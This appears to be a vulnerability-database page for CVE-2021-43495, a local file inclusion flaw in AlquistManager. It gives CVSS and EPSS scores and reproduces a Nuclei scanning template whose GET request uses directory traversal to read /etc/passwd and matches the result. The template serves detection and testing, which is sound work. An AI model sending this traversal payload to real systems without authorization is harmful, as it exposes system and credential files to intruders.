Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-43495
HistoryNov 23, 2021 - 1:30 a.m.

AlquistManager Local File Inclusion

2021-11-2301:30:30
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.031 Low

EPSS

Percentile

91.1%

AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.

id: CVE-2021-43495

info:
  name: AlquistManager Local File Inclusion
  author: pikpikcu
  severity: high
  description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions.
  reference:
    - https://github.com/AlquistManager/alquist/issues/43
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43495
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43495
    cwe-id: CWE-22
    epss-score: 0.03503
    epss-percentile: 0.9064
    cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: alquistai
    product: alquist
  tags: cve2021,cve,lfi,alquist,alquistai

http:
  - method: GET
    path:
      - "{{BaseURL}}/asd/../../../../../../../../etc/passwd"

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a0046304402201b2d7627f8e82d80cdbe6904bba88f6a038181353ec8996fb056881d0978806e02204460799ea043136ca0ccaa22ecb91525314df73d51eef3466502e3fa56a8c82c:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.031 Low

EPSS

Percentile

91.1%

Related for NUCLEI:CVE-2021-43495